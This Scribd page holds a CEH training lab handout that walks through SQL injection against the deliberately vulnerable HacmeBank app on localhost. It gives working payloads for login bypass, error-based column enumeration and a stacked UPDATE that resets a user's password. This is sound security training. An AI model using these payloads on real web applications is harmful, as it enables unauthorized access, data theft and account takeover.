Location via proxy:   [ UP ]  
[Report a bug]   [Manage cookies]                
Scribd
Upload
18 views7 pages

Ceh Sqlinjection

Uploaded by

Alain Borntomix

Copyright:

© All Rights Reserved
Download as PDF, TXT or read online from Scribd
Download as pdf or txt

Ceh Sqlinjection

Uploaded by

Alain Borntomix
18 views7 pages

Copyright

© © All Rights Reserved

Available Formats

PDF, TXT or read online from Scribd

Did you find this document useful?

Is this content inappropriate?

Copyright:

© All Rights Reserved
Download as PDF, TXT or read online from Scribd
Download as pdf or txt
18 views7 pages

Ceh Sqlinjection

Uploaded by

Alain Borntomix

Copyright:

© All Rights Reserved
Download as PDF, TXT or read online from Scribd
Download as pdf or txt
You are on page 1/ 7

©2011-BR

CEH - SQL INJECTION

Configuration:

Your machine is TARGET-A, running Windows 2003 server.

Objectives:

Using SQL Injection in HACMEBANK application, to bypass password authentication,


then Enumerate fieldname, and try to Insert a new record.

Tools:

Internet Explorer.
HACMEBANK application.

Preparation:

To login to HACMEBANK application, use these information :

Username : jv
Password : jv789

1
©2011-BR

I. AUTHENTICATION BYPASS
Detailed Steps:

1. On TARGET-A, open Internet Explorer and go to this URL :

http://localhost/HacmeBank_v2_Website/aspx/login.aspx

2. Try to login with username : jv , password : jv789

3. You can see there’s a welcome message and logout button. This two items indicate
that you’ve been successfully log-on to this hacmebank.

4. Then log out 

2
©2011-BR

5. Then try to login, using :

Username : jv
Password : ' or 1=1 --

You should still be able to login, without password  .


Log out again.

3
©2011-BR

II. TABLE ENUMERATION

1. First, try to generate an error message by using input form.


On the username input box, type :

' having 1=1 --

This will make the application to display the error message :

Column 'fsb_users.user_id' is invalid in the select list because it is


not contained in an aggregate function and there is no GROUP BY clause.

From there we can determine that the name of the table storing login information is
FSB_USERS and that it has a column named USER_ID

4
©2011-BR

2. The next step towards that is obtaining the name of all the column names of the
table.

So, we input this text into the username box :

' union select * from fsb_users where user_id =


'jv' group by user_id --

This results in a SQL exception that reveals additional column names.

Column 'fsb_users.user_name' is invalid in the select list because it


is not contained in either an aggregate function or the GROUP BY
clause.

5
©2011-BR

Continue to enumerate all columns :

3. ' union select * from fsb_users where user_id = 'jv'


group by user_id, user_name having 1=1 --

4. ' union select * from fsb_users where user_id = 'jv'


group by user_id, user_name, login_id having 1=1 --

5. ' union select * from fsb_users where user_id = 'jv'


group by user_id, user_name, login_id, password having 1=1
-–

6. ' union select * from fsb_users where user_id = 'jv'


group by user_id, user_name, login_id, password,
creation_date having 1=1 -–

Untill you see this error message :

6
©2011-BR

III. CHANGING PASSWORD


Now, you already got the table structure

FSB_USERS . user.id
FSB_USERS . user_name
FSB_USERS . login_id
FSB_USERS . password
FSB_USERS . creation_date

1. After this, you need know the data type of column FSB_USERS.password, use this
SQL statement :

' UNION SELECT SUM(PASSWORD) FROM FSB_USERS HAVING 1=1 --

You will get an error message, stating that FSB_USERS.password data type is
VARCHAR.
The sum or average aggregate operation cannot take a
varchar data type as an argument

2. Then try to change the password of username ‘jv’ (FSB._USERS.password)


Using the SQL Syntax below :

'; UPDATE FSB_USERS SET PASSWORD = 'TEST123' WHERE LOGIN_ID


= 'JV' --

You will see an error, its normal. Just try to login using the new password 

You might also like